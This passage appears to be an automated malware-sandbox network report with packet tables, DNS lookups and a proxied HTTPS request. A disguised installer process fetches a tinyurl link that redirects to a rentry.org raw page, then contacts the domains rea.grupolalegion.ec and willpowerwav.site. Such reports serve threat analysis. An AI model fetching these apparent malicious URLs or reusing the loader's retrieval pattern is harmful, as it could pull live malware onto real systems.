Mar 8, 2025 03:14:35.325215101 CET	49724	443	192.168.2.4	190.92.154.206
Mar 8, 2025 03:14:35.338545084 CET	443	49724	190.92.154.206	192.168.2.4
Mar 8, 2025 03:14:35.338587999 CET	443	49724	190.92.154.206	192.168.2.4
Mar 8, 2025 03:14:35.338627100 CET	49724	443	192.168.2.4	190.92.154.206
Mar 8, 2025 03:14:35.338650942 CET	443	49724	190.92.154.206	192.168.2.4
Mar 8, 2025 03:14:35.338681936 CET	49724	443	192.168.2.4	190.92.154.206
Mar 8, 2025 03:14:35.338704109 CET	49724	443	192.168.2.4	190.92.154.206
Mar 8, 2025 03:14:35.351294041 CET	443	49724	190.92.154.206	192.168.2.4
Mar 8, 2025 03:14:35.351337910 CET	443	49724	190.92.154.206	192.168.2.4
Mar 8, 2025 03:14:35.351373911 CET	49724	443	192.168.2.4	190.92.154.206
Mar 8, 2025 03:14:35.351382017 CET	443	49724	190.92.154.206	192.168.2.4
Mar 8, 2025 03:14:35.351438999 CET	49724	443	192.168.2.4	190.92.154.206
Mar 8, 2025 03:14:35.361159086 CET	443	49724	190.92.154.206	192.168.2.4
Mar 8, 2025 03:14:35.361205101 CET	443	49724	190.92.154.206	192.168.2.4
Mar 8, 2025 03:14:35.361237049 CET	49724	443	192.168.2.4	190.92.154.206
Mar 8, 2025 03:14:35.361243010 CET	443	49724	190.92.154.206	192.168.2.4
Mar 8, 2025 03:14:35.361299038 CET	49724	443	192.168.2.4	190.92.154.206
Mar 8, 2025 03:14:35.372883081 CET	443	49724	190.92.154.206	192.168.2.4
Mar 8, 2025 03:14:35.372927904 CET	443	49724	190.92.154.206	192.168.2.4
Mar 8, 2025 03:14:35.372963905 CET	49724	443	192.168.2.4	190.92.154.206
Mar 8, 2025 03:14:35.372986078 CET	443	49724	190.92.154.206	192.168.2.4
Mar 8, 2025 03:14:35.373024940 CET	49724	443	192.168.2.4	190.92.154.206
Mar 8, 2025 03:14:35.373045921 CET	49724	443	192.168.2.4	190.92.154.206
Mar 8, 2025 03:14:35.387973070 CET	443	49724	190.92.154.206	192.168.2.4
Mar 8, 2025 03:14:35.388016939 CET	443	49724	190.92.154.206	192.168.2.4
Mar 8, 2025 03:14:35.388055086 CET	49724	443	192.168.2.4	190.92.154.206
Mar 8, 2025 03:14:35.388077974 CET	443	49724	190.92.154.206	192.168.2.4
Mar 8, 2025 03:14:35.388119936 CET	49724	443	192.168.2.4	190.92.154.206
Mar 8, 2025 03:14:35.388149023 CET	49724	443	192.168.2.4	190.92.154.206
Mar 8, 2025 03:14:35.391058922 CET	443	49724	190.92.154.206	192.168.2.4
Mar 8, 2025 03:14:35.391103029 CET	443	49724	190.92.154.206	192.168.2.4
Mar 8, 2025 03:14:35.391138077 CET	49724	443	192.168.2.4	190.92.154.206
Mar 8, 2025 03:14:35.391144991 CET	443	49724	190.92.154.206	192.168.2.4
Mar 8, 2025 03:14:35.391187906 CET	49724	443	192.168.2.4	190.92.154.206
Mar 8, 2025 03:14:35.400847912 CET	443	49724	190.92.154.206	192.168.2.4
Mar 8, 2025 03:14:35.400890112 CET	443	49724	190.92.154.206	192.168.2.4
Mar 8, 2025 03:14:35.400928020 CET	49724	443	192.168.2.4	190.92.154.206
Mar 8, 2025 03:14:35.400935888 CET	443	49724	190.92.154.206	192.168.2.4
Mar 8, 2025 03:14:35.400984049 CET	49724	443	192.168.2.4	190.92.154.206
Mar 8, 2025 03:14:35.416776896 CET	443	49724	190.92.154.206	192.168.2.4
Mar 8, 2025 03:14:35.416821003 CET	443	49724	190.92.154.206	192.168.2.4
Mar 8, 2025 03:14:35.416862965 CET	49724	443	192.168.2.4	190.92.154.206
Mar 8, 2025 03:14:35.416879892 CET	443	49724	190.92.154.206	192.168.2.4
Mar 8, 2025 03:14:35.416917086 CET	49724	443	192.168.2.4	190.92.154.206
Mar 8, 2025 03:14:35.416938066 CET	49724	443	192.168.2.4	190.92.154.206
Mar 8, 2025 03:14:35.430419922 CET	443	49724	190.92.154.206	192.168.2.4
Mar 8, 2025 03:14:35.430464029 CET	443	49724	190.92.154.206	192.168.2.4
Mar 8, 2025 03:14:35.430500984 CET	49724	443	192.168.2.4	190.92.154.206
Mar 8, 2025 03:14:35.430524111 CET	443	49724	190.92.154.206	192.168.2.4
Mar 8, 2025 03:14:35.430541992 CET	49724	443	192.168.2.4	190.92.154.206
Mar 8, 2025 03:14:35.430583000 CET	49724	443	192.168.2.4	190.92.154.206
Mar 8, 2025 03:14:35.443048954 CET	443	49724	190.92.154.206	192.168.2.4
Mar 8, 2025 03:14:35.443093061 CET	443	49724	190.92.154.206	192.168.2.4
Mar 8, 2025 03:14:35.443128109 CET	49724	443	192.168.2.4	190.92.154.206
Mar 8, 2025 03:14:35.443140030 CET	443	49724	190.92.154.206	192.168.2.4
Mar 8, 2025 03:14:35.443197966 CET	49724	443	192.168.2.4	190.92.154.206
Mar 8, 2025 03:14:35.453093052 CET	443	49724	190.92.154.206	192.168.2.4
Mar 8, 2025 03:14:35.453140974 CET	443	49724	190.92.154.206	192.168.2.4
Mar 8, 2025 03:14:35.453177929 CET	49724	443	192.168.2.4	190.92.154.206
Mar 8, 2025 03:14:35.453186035 CET	443	49724	190.92.154.206	192.168.2.4
Mar 8, 2025 03:14:35.453234911 CET	49724	443	192.168.2.4	190.92.154.206
Mar 8, 2025 03:14:35.453241110 CET	443	49724	190.92.154.206	192.168.2.4
Mar 8, 2025 03:14:35.453468084 CET	49724	443	192.168.2.4	190.92.154.206
Mar 8, 2025 03:14:35.469361067 CET	443	49724	190.92.154.206	192.168.2.4
Mar 8, 2025 03:14:35.469408035 CET	443	49724	190.92.154.206	192.168.2.4
Mar 8, 2025 03:14:35.469448090 CET	49724	443	192.168.2.4	190.92.154.206
Mar 8, 2025 03:14:35.469470024 CET	443	49724	190.92.154.206	192.168.2.4
Mar 8, 2025 03:14:35.469504118 CET	49724	443	192.168.2.4	190.92.154.206
Mar 8, 2025 03:14:35.469527960 CET	49724	443	192.168.2.4	190.92.154.206
Mar 8, 2025 03:14:35.479340076 CET	443	49724	190.92.154.206	192.168.2.4
Mar 8, 2025 03:14:35.479387045 CET	443	49724	190.92.154.206	192.168.2.4
Mar 8, 2025 03:14:35.479425907 CET	49724	443	192.168.2.4	190.92.154.206
Mar 8, 2025 03:14:35.479450941 CET	443	49724	190.92.154.206	192.168.2.4
Mar 8, 2025 03:14:35.479490995 CET	49724	443	192.168.2.4	190.92.154.206
Mar 8, 2025 03:14:35.479515076 CET	49724	443	192.168.2.4	190.92.154.206
Mar 8, 2025 03:14:35.482930899 CET	443	49724	190.92.154.206	192.168.2.4
Mar 8, 2025 03:14:35.482985973 CET	443	49724	190.92.154.206	192.168.2.4
Mar 8, 2025 03:14:35.487845898 CET	49724	443	192.168.2.4	190.92.154.206
Mar 8, 2025 03:14:35.487858057 CET	443	49724	190.92.154.206	192.168.2.4
Mar 8, 2025 03:14:35.487905979 CET	49724	443	192.168.2.4	190.92.154.206
Mar 8, 2025 03:14:35.492683887 CET	443	49724	190.92.154.206	192.168.2.4
Mar 8, 2025 03:14:35.492728949 CET	443	49724	190.92.154.206	192.168.2.4
Mar 8, 2025 03:14:35.492769957 CET	49724	443	192.168.2.4	190.92.154.206
Mar 8, 2025 03:14:35.492779016 CET	443	49724	190.92.154.206	192.168.2.4
Mar 8, 2025 03:14:35.492842913 CET	49724	443	192.168.2.4	190.92.154.206
Mar 8, 2025 03:14:35.508475065 CET	443	49724	190.92.154.206	192.168.2.4
Mar 8, 2025 03:14:35.508521080 CET	443	49724	190.92.154.206	192.168.2.4
Mar 8, 2025 03:14:35.508569002 CET	49724	443	192.168.2.4	190.92.154.206
Mar 8, 2025 03:14:35.508594036 CET	443	49724	190.92.154.206	192.168.2.4
Mar 8, 2025 03:14:35.508641958 CET	49724	443	192.168.2.4	190.92.154.206
Mar 8, 2025 03:14:35.508665085 CET	49724	443	192.168.2.4	190.92.154.206
Mar 8, 2025 03:14:35.522054911 CET	443	49724	190.92.154.206	192.168.2.4
Mar 8, 2025 03:14:35.522082090 CET	443	49724	190.92.154.206	192.168.2.4
Mar 8, 2025 03:14:35.522154093 CET	49724	443	192.168.2.4	190.92.154.206
Mar 8, 2025 03:14:35.522171021 CET	443	49724	190.92.154.206	192.168.2.4
Mar 8, 2025 03:14:35.522243977 CET	49724	443	192.168.2.4	190.92.154.206
Mar 8, 2025 03:14:35.534729004 CET	443	49724	190.92.154.206	192.168.2.4
Mar 8, 2025 03:14:35.534753084 CET	443	49724	190.92.154.206	192.168.2.4
Mar 8, 2025 03:14:35.534810066 CET	49724	443	192.168.2.4	190.92.154.206
Mar 8, 2025 03:14:35.534828901 CET	443	49724	190.92.154.206	192.168.2.4
Mar 8, 2025 03:14:35.534884930 CET	49724	443	192.168.2.4	190.92.154.206
Mar 8, 2025 03:14:35.544929981 CET	443	49724	190.92.154.206	192.168.2.4
Mar 8, 2025 03:14:35.544954062 CET	443	49724	190.92.154.206	192.168.2.4
Mar 8, 2025 03:14:35.545006037 CET	49724	443	192.168.2.4	190.92.154.206
Mar 8, 2025 03:14:35.545020103 CET	443	49724	190.92.154.206	192.168.2.4
Mar 8, 2025 03:14:35.545066118 CET	49724	443	192.168.2.4	190.92.154.206
Mar 8, 2025 03:14:35.556018114 CET	443	49724	190.92.154.206	192.168.2.4
Mar 8, 2025 03:14:35.556041002 CET	443	49724	190.92.154.206	192.168.2.4
Mar 8, 2025 03:14:35.556087971 CET	49724	443	192.168.2.4	190.92.154.206
Mar 8, 2025 03:14:35.556101084 CET	443	49724	190.92.154.206	192.168.2.4
Mar 8, 2025 03:14:35.556148052 CET	49724	443	192.168.2.4	190.92.154.206
Mar 8, 2025 03:14:35.571397066 CET	443	49724	190.92.154.206	192.168.2.4
Mar 8, 2025 03:14:35.571419001 CET	443	49724	190.92.154.206	192.168.2.4
Mar 8, 2025 03:14:35.571487904 CET	49724	443	192.168.2.4	190.92.154.206
Mar 8, 2025 03:14:35.571502924 CET	443	49724	190.92.154.206	192.168.2.4
Mar 8, 2025 03:14:35.571549892 CET	49724	443	192.168.2.4	190.92.154.206
Mar 8, 2025 03:14:35.574364901 CET	443	49724	190.92.154.206	192.168.2.4
Mar 8, 2025 03:14:35.574385881 CET	443	49724	190.92.154.206	192.168.2.4
Mar 8, 2025 03:14:35.574433088 CET	49724	443	192.168.2.4	190.92.154.206
Mar 8, 2025 03:14:35.574440956 CET	443	49724	190.92.154.206	192.168.2.4
Mar 8, 2025 03:14:35.574491978 CET	49724	443	192.168.2.4	190.92.154.206
Mar 8, 2025 03:14:35.584755898 CET	443	49724	190.92.154.206	192.168.2.4
Mar 8, 2025 03:14:35.584783077 CET	443	49724	190.92.154.206	192.168.2.4
Mar 8, 2025 03:14:35.584852934 CET	49724	443	192.168.2.4	190.92.154.206
Mar 8, 2025 03:14:35.584866047 CET	443	49724	190.92.154.206	192.168.2.4
Mar 8, 2025 03:14:35.585129976 CET	49724	443	192.168.2.4	190.92.154.206
Mar 8, 2025 03:14:35.600532055 CET	443	49724	190.92.154.206	192.168.2.4
Mar 8, 2025 03:14:35.600559950 CET	443	49724	190.92.154.206	192.168.2.4
Mar 8, 2025 03:14:35.600620031 CET	49724	443	192.168.2.4	190.92.154.206
Mar 8, 2025 03:14:35.600636005 CET	443	49724	190.92.154.206	192.168.2.4
Mar 8, 2025 03:14:35.600686073 CET	49724	443	192.168.2.4	190.92.154.206
Mar 8, 2025 03:14:35.613653898 CET	443	49724	190.92.154.206	192.168.2.4
Mar 8, 2025 03:14:35.613687038 CET	443	49724	190.92.154.206	192.168.2.4
Mar 8, 2025 03:14:35.613745928 CET	49724	443	192.168.2.4	190.92.154.206
Mar 8, 2025 03:14:35.613756895 CET	443	49724	190.92.154.206	192.168.2.4
Mar 8, 2025 03:14:35.613811970 CET	49724	443	192.168.2.4	190.92.154.206
Mar 8, 2025 03:14:35.631371975 CET	443	49724	190.92.154.206	192.168.2.4
Mar 8, 2025 03:14:35.631433964 CET	443	49724	190.92.154.206	192.168.2.4
Mar 8, 2025 03:14:35.631500959 CET	49724	443	192.168.2.4	190.92.154.206
Mar 8, 2025 03:14:35.631510973 CET	443	49724	190.92.154.206	192.168.2.4
Mar 8, 2025 03:14:35.631553888 CET	49724	443	192.168.2.4	190.92.154.206
Mar 8, 2025 03:14:35.631593943 CET	49724	443	192.168.2.4	190.92.154.206
Mar 8, 2025 03:14:35.647002935 CET	443	49724	190.92.154.206	192.168.2.4
Mar 8, 2025 03:14:35.647063017 CET	443	49724	190.92.154.206	192.168.2.4
Mar 8, 2025 03:14:35.647202015 CET	49724	443	192.168.2.4	190.92.154.206
Mar 8, 2025 03:14:35.647202015 CET	49724	443	192.168.2.4	190.92.154.206
Mar 8, 2025 03:14:35.647213936 CET	443	49724	190.92.154.206	192.168.2.4
Mar 8, 2025 03:14:35.648617029 CET	443	49724	190.92.154.206	192.168.2.4
Mar 8, 2025 03:14:35.648649931 CET	49724	443	192.168.2.4	190.92.154.206
Mar 8, 2025 03:14:35.648669958 CET	443	49724	190.92.154.206	192.168.2.4
Mar 8, 2025 03:14:35.648700953 CET	443	49724	190.92.154.206	192.168.2.4
Mar 8, 2025 03:14:35.648713112 CET	49724	443	192.168.2.4	190.92.154.206
Mar 8, 2025 03:14:35.648749113 CET	49724	443	192.168.2.4	190.92.154.206
Mar 8, 2025 03:14:35.648823977 CET	49724	443	192.168.2.4	190.92.154.206
Mar 8, 2025 03:14:35.663602114 CET	443	49724	190.92.154.206	192.168.2.4
Mar 8, 2025 03:14:35.663661957 CET	443	49724	190.92.154.206	192.168.2.4
Mar 8, 2025 03:14:35.663821936 CET	49724	443	192.168.2.4	190.92.154.206
Mar 8, 2025 03:14:35.663821936 CET	49724	443	192.168.2.4	190.92.154.206
Mar 8, 2025 03:14:35.663835049 CET	443	49724	190.92.154.206	192.168.2.4
Mar 8, 2025 03:14:35.663975000 CET	49724	443	192.168.2.4	190.92.154.206
Mar 8, 2025 03:14:35.666603088 CET	443	49724	190.92.154.206	192.168.2.4
Mar 8, 2025 03:14:35.666646004 CET	443	49724	190.92.154.206	192.168.2.4
Mar 8, 2025 03:14:35.666733980 CET	49724	443	192.168.2.4	190.92.154.206
Mar 8, 2025 03:14:35.666733980 CET	49724	443	192.168.2.4	190.92.154.206
Mar 8, 2025 03:14:35.666742086 CET	443	49724	190.92.154.206	192.168.2.4
Mar 8, 2025 03:14:35.666800976 CET	49724	443	192.168.2.4	190.92.154.206
Mar 8, 2025 03:14:35.676930904 CET	443	49724	190.92.154.206	192.168.2.4
Mar 8, 2025 03:14:35.676989079 CET	443	49724	190.92.154.206	192.168.2.4
Mar 8, 2025 03:14:35.677119017 CET	49724	443	192.168.2.4	190.92.154.206
Mar 8, 2025 03:14:35.677119017 CET	49724	443	192.168.2.4	190.92.154.206
Mar 8, 2025 03:14:35.677130938 CET	443	49724	190.92.154.206	192.168.2.4
Mar 8, 2025 03:14:35.680591106 CET	49724	443	192.168.2.4	190.92.154.206
Mar 8, 2025 03:14:35.692347050 CET	443	49724	190.92.154.206	192.168.2.4
Mar 8, 2025 03:14:35.692389011 CET	443	49724	190.92.154.206	192.168.2.4
Mar 8, 2025 03:14:35.692481041 CET	49724	443	192.168.2.4	190.92.154.206
Mar 8, 2025 03:14:35.692481995 CET	49724	443	192.168.2.4	190.92.154.206
Mar 8, 2025 03:14:35.692493916 CET	443	49724	190.92.154.206	192.168.2.4
Mar 8, 2025 03:14:35.692691088 CET	49724	443	192.168.2.4	190.92.154.206
Mar 8, 2025 03:14:35.705667019 CET	443	49724	190.92.154.206	192.168.2.4
Mar 8, 2025 03:14:35.705713034 CET	443	49724	190.92.154.206	192.168.2.4
Mar 8, 2025 03:14:35.705852032 CET	49724	443	192.168.2.4	190.92.154.206
Mar 8, 2025 03:14:35.705852032 CET	49724	443	192.168.2.4	190.92.154.206
Mar 8, 2025 03:14:35.705884933 CET	443	49724	190.92.154.206	192.168.2.4
Mar 8, 2025 03:14:35.708673954 CET	49724	443	192.168.2.4	190.92.154.206
Mar 8, 2025 03:14:35.718517065 CET	443	49724	190.92.154.206	192.168.2.4
Mar 8, 2025 03:14:35.718560934 CET	443	49724	190.92.154.206	192.168.2.4
Mar 8, 2025 03:14:35.718642950 CET	49724	443	192.168.2.4	190.92.154.206
Mar 8, 2025 03:14:35.718642950 CET	49724	443	192.168.2.4	190.92.154.206
Mar 8, 2025 03:14:35.718652010 CET	443	49724	190.92.154.206	192.168.2.4
Mar 8, 2025 03:14:35.718810081 CET	49724	443	192.168.2.4	190.92.154.206
Mar 8, 2025 03:14:35.738435984 CET	443	49724	190.92.154.206	192.168.2.4
Mar 8, 2025 03:14:35.738476038 CET	443	49724	190.92.154.206	192.168.2.4
Mar 8, 2025 03:14:35.738548040 CET	49724	443	192.168.2.4	190.92.154.206
Mar 8, 2025 03:14:35.738555908 CET	443	49724	190.92.154.206	192.168.2.4
Mar 8, 2025 03:14:35.738744020 CET	49724	443	192.168.2.4	190.92.154.206
Mar 8, 2025 03:14:35.738827944 CET	443	49724	190.92.154.206	192.168.2.4
Mar 8, 2025 03:14:35.738967896 CET	49724	443	192.168.2.4	190.92.154.206
Mar 8, 2025 03:14:35.738967896 CET	49724	443	192.168.2.4	190.92.154.206
Mar 8, 2025 03:14:35.738977909 CET	443	49724	190.92.154.206	192.168.2.4
Mar 8, 2025 03:14:35.739109039 CET	49724	443	192.168.2.4	190.92.154.206
Mar 8, 2025 03:14:47.875945091 CET	49727	443	192.168.2.4	172.67.194.165
Mar 8, 2025 03:14:47.876008987 CET	443	49727	172.67.194.165	192.168.2.4
Mar 8, 2025 03:14:47.876096010 CET	49727	443	192.168.2.4	172.67.194.165
Mar 8, 2025 03:14:47.877335072 CET	49727	443	192.168.2.4	172.67.194.165
Mar 8, 2025 03:14:47.877372026 CET	443	49727	172.67.194.165	192.168.2.4
Mar 8, 2025 03:14:49.607589960 CET	443	49727	172.67.194.165	192.168.2.4
Mar 8, 2025 03:14:49.607821941 CET	49727	443	192.168.2.4	172.67.194.165
Mar 8, 2025 03:14:49.612375021 CET	49727	443	192.168.2.4	172.67.194.165
Mar 8, 2025 03:14:49.612427950 CET	443	49727	172.67.194.165	192.168.2.4
Mar 8, 2025 03:14:49.612674952 CET	443	49727	172.67.194.165	192.168.2.4
Mar 8, 2025 03:14:49.679079056 CET	49727	443	192.168.2.4	172.67.194.165
Mar 8, 2025 03:14:49.679079056 CET	49727	443	192.168.2.4	172.67.194.165
Mar 8, 2025 03:14:49.679296970 CET	443	49727	172.67.194.165	192.168.2.4
Mar 8, 2025 03:14:50.090025902 CET	443	49727	172.67.194.165	192.168.2.4
Mar 8, 2025 03:14:50.090157986 CET	443	49727	172.67.194.165	192.168.2.4
Mar 8, 2025 03:14:50.090249062 CET	443	49727	172.67.194.165	192.168.2.4
Mar 8, 2025 03:14:50.090276003 CET	49727	443	192.168.2.4	172.67.194.165
Mar 8, 2025 03:14:50.090320110 CET	443	49727	172.67.194.165	192.168.2.4
Mar 8, 2025 03:14:50.090508938 CET	49727	443	192.168.2.4	172.67.194.165
Mar 8, 2025 03:14:50.090527058 CET	443	49727	172.67.194.165	192.168.2.4
Mar 8, 2025 03:14:50.090801001 CET	443	49727	172.67.194.165	192.168.2.4
Mar 8, 2025 03:14:50.090972900 CET	49727	443	192.168.2.4	172.67.194.165
Mar 8, 2025 03:14:50.091169119 CET	49727	443	192.168.2.4	172.67.194.165
Mar 8, 2025 03:14:50.091206074 CET	443	49727	172.67.194.165	192.168.2.4
Mar 8, 2025 03:14:50.091232061 CET	49727	443	192.168.2.4	172.67.194.165
Mar 8, 2025 03:14:50.091248035 CET	443	49727	172.67.194.165	192.168.2.4
Mar 8, 2025 03:14:50.227298021 CET	49728	443	192.168.2.4	172.67.194.165
Mar 8, 2025 03:14:50.227395058 CET	443	49728	172.67.194.165	192.168.2.4
Mar 8, 2025 03:14:50.227490902 CET	49728	443	192.168.2.4	172.67.194.165
Mar 8, 2025 03:14:50.227902889 CET	49728	443	192.168.2.4	172.67.194.165
Mar 8, 2025 03:14:50.227937937 CET	443	49728	172.67.194.165	192.168.2.4
Mar 8, 2025 03:14:51.824280977 CET	49728	443	192.168.2.4	172.67.194.165
Mar 8, 2025 03:15:40.122445107 CET	49729	443	192.168.2.4	172.67.194.165
Mar 8, 2025 03:15:40.122558117 CET	443	49729	172.67.194.165	192.168.2.4
Mar 8, 2025 03:15:40.122725964 CET	49729	443	192.168.2.4	172.67.194.165
Mar 8, 2025 03:15:40.123730898 CET	49729	443	192.168.2.4	172.67.194.165
Mar 8, 2025 03:15:40.123769999 CET	443	49729	172.67.194.165	192.168.2.4
Mar 8, 2025 03:15:41.810759068 CET	443	49729	172.67.194.165	192.168.2.4
Mar 8, 2025 03:15:41.810908079 CET	49729	443	192.168.2.4	172.67.194.165
Mar 8, 2025 03:15:41.812017918 CET	49729	443	192.168.2.4	172.67.194.165
Mar 8, 2025 03:15:41.812069893 CET	443	49729	172.67.194.165	192.168.2.4
Mar 8, 2025 03:15:41.812906981 CET	443	49729	172.67.194.165	192.168.2.4
Mar 8, 2025 03:15:41.855329037 CET	49729	443	192.168.2.4	172.67.194.165
Mar 8, 2025 03:15:41.863141060 CET	49729	443	192.168.2.4	172.67.194.165
Mar 8, 2025 03:15:41.863141060 CET	49729	443	192.168.2.4	172.67.194.165
Mar 8, 2025 03:15:41.863558054 CET	443	49729	172.67.194.165	192.168.2.4
Mar 8, 2025 03:15:42.293421984 CET	443	49729	172.67.194.165	192.168.2.4
Mar 8, 2025 03:15:42.293550968 CET	443	49729	172.67.194.165	192.168.2.4
Mar 8, 2025 03:15:42.293643951 CET	49729	443	192.168.2.4	172.67.194.165
Mar 8, 2025 03:15:42.293659925 CET	443	49729	172.67.194.165	192.168.2.4
Mar 8, 2025 03:15:42.293688059 CET	443	49729	172.67.194.165	192.168.2.4
Mar 8, 2025 03:15:42.293979883 CET	443	49729	172.67.194.165	192.168.2.4
Mar 8, 2025 03:15:42.294025898 CET	49729	443	192.168.2.4	172.67.194.165
Mar 8, 2025 03:15:42.294064045 CET	49729	443	192.168.2.4	172.67.194.165
Mar 8, 2025 03:15:42.294228077 CET	49729	443	192.168.2.4	172.67.194.165
Mar 8, 2025 03:15:42.294275999 CET	443	49729	172.67.194.165	192.168.2.4
Mar 8, 2025 03:15:42.294329882 CET	49729	443	192.168.2.4	172.67.194.165
Mar 8, 2025 03:15:42.294346094 CET	443	49729	172.67.194.165	192.168.2.4
Mar 8, 2025 03:15:42.424360991 CET	49730	443	192.168.2.4	172.67.194.165
Mar 8, 2025 03:15:42.424393892 CET	443	49730	172.67.194.165	192.168.2.4
Mar 8, 2025 03:15:42.424515963 CET	49730	443	192.168.2.4	172.67.194.165
Mar 8, 2025 03:15:42.424935102 CET	49730	443	192.168.2.4	172.67.194.165
Mar 8, 2025 03:15:42.424947023 CET	443	49730	172.67.194.165	192.168.2.4
Mar 8, 2025 03:15:44.107187033 CET	49730	443	192.168.2.4	172.67.194.165

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Mar 8, 2025 03:14:24.891801119 CET	58295	53	192.168.2.4	1.1.1.1
Mar 8, 2025 03:14:24.899269104 CET	53	58295	1.1.1.1	192.168.2.4
Mar 8, 2025 03:14:27.361787081 CET	63401	53	192.168.2.4	1.1.1.1
Mar 8, 2025 03:14:27.389595032 CET	53	63401	1.1.1.1	192.168.2.4
Mar 8, 2025 03:14:30.202147961 CET	55279	53	192.168.2.4	1.1.1.1
Mar 8, 2025 03:14:30.411114931 CET	53	55279	1.1.1.1	192.168.2.4
Mar 8, 2025 03:14:47.858890057 CET	61965	53	192.168.2.4	1.1.1.1
Mar 8, 2025 03:14:47.871201992 CET	53	61965	1.1.1.1	192.168.2.4

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Mar 8, 2025 03:14:24.891801119 CET	192.168.2.4	1.1.1.1	0x6841	Standard query (0)	tinyurl.com	A (IP address)	IN (0x0001)	false
Mar 8, 2025 03:14:27.361787081 CET	192.168.2.4	1.1.1.1	0xc1f6	Standard query (0)	rentry.org	A (IP address)	IN (0x0001)	false
Mar 8, 2025 03:14:30.202147961 CET	192.168.2.4	1.1.1.1	0xcb1a	Standard query (0)	rea.grupolalegion.ec	A (IP address)	IN (0x0001)	false
Mar 8, 2025 03:14:47.858890057 CET	192.168.2.4	1.1.1.1	0x27f7	Standard query (0)	willpowerwav.site	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	Address	Type	Class	DNS over HTTPS
Mar 8, 2025 03:14:24.899269104 CET	1.1.1.1	192.168.2.4	0x6841	No error (0)	tinyurl.com	104.18.111.161	A (IP address)	IN (0x0001)	false
Mar 8, 2025 03:14:24.899269104 CET	1.1.1.1	192.168.2.4	0x6841	No error (0)	tinyurl.com	104.17.112.233	A (IP address)	IN (0x0001)	false
Mar 8, 2025 03:14:27.389595032 CET	1.1.1.1	192.168.2.4	0xc1f6	No error (0)	rentry.org	164.132.58.105	A (IP address)	IN (0x0001)	false
Mar 8, 2025 03:14:30.411114931 CET	1.1.1.1	192.168.2.4	0xcb1a	No error (0)	rea.grupolalegion.ec	190.92.154.206	A (IP address)	IN (0x0001)	false
Mar 8, 2025 03:14:47.871201992 CET	1.1.1.1	192.168.2.4	0x27f7	No error (0)	willpowerwav.site	172.67.194.165	A (IP address)	IN (0x0001)	false
Mar 8, 2025 03:14:47.871201992 CET	1.1.1.1	192.168.2.4	0x27f7	No error (0)	willpowerwav.site	104.21.44.37	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

tinyurl.com

rentry.org

rea.grupolalegion.ec

willpowerwav.site

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.4	49717	104.18.111.161	443	6800	C:\Users\user\AppData\Local\Temp\is-Q5OPF.tmp\Magic_V_pro_setup_stable_latest_release_version_9_709.tmp

Timestamp	Bytes transferred	Direction	Data
2025-03-08 02:14:26 UTC	192	OUT	GET /y7yju2tp HTTP/1.1 Connection: Keep-Alive Accept: / User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) rentry-auth: e9700e0e5dfc56e362dbe75f Host: tinyurl.com
2025-03-08 02:14:27 UTC	1259	IN	HTTP/1.1 301 Moved Permanently Date: Sat, 08 Mar 2025 02:14:27 GMT Content-Type: text/html; charset=utf-8 Transfer-Encoding: chunked Connection: close location: https://rentry.org/cc3ba8b679c926fc9911aede9009e589cbd3667c48439c630418d27fdbb52fc8/raw referrer-policy: unsafe-url x-robots-tag: noindex x-tinyurl-redirect-type: redirect Cache-Control: max-age=0, must-revalidate, no-cache, no-store, private x-tinyurl-redirect: eyJpdiI6IjBrWlgvRjdnU2ZDUXZiajRlQXFyY0E9PSIsInZhbHVlIjoiV0RIeXRoV0JtOGdxaGdaeGJ5T0FkdW9Ocm5OSkpmOWMzaFZza0U3YTJ3b3E1RExWaWVFUEFVemg0d3RkVFdvZGZ5amNSSzJKZGZQN3NZblVqS3FZYnc9PSIsIm1hYyI6Ijc2MzdhOTI3OTE4OTI2MTI3ZWU4NGQwZjE4OTA5OGYzYjNmMTUzNDczMzc3NmVhZjAxMmJmZjQxZGQ0NTU3ODciLCJ0YWciOiIifQ== x-content-type-options: nosniff x-xss-protection: 1; mode=block CF-Cache-Status: MISS Set-Cookie: __cf_bm=1Nc89KBWSPXMGcFaVPLXXHLZfk_kNsmb3FZeiUrBdyw-1741400067-1.0.1.1-huqr8UO_tt7osbI0zbYsqh0CaLdAQe7NfoI3V1OdO8wWIL6jd2ocFXNO9BG2ckMCfjVb0z2jNpz8XbPWMeTgTIohrDJ8TOyW5gXReTOqFnU; path=/; expires=Sat, 08-Mar-25 02:44:27 GMT; domain=.tinyurl.com; HttpOnly; Secure; SameSite=None Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Server: cloudflare CF-RAY: 91ced1b28b143b8d-BOS alt-svc: h3=":443"; ma=86400
2025-03-08 02:14:27 UTC	110	IN	Data Raw: 32 35 32 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 72 65 66 72 65 73 68 22 20 63 6f 6e Data Ascii: 252<!DOCTYPE html><html> <head> <meta charset="UTF-8" /> <meta http-equiv="refresh" con
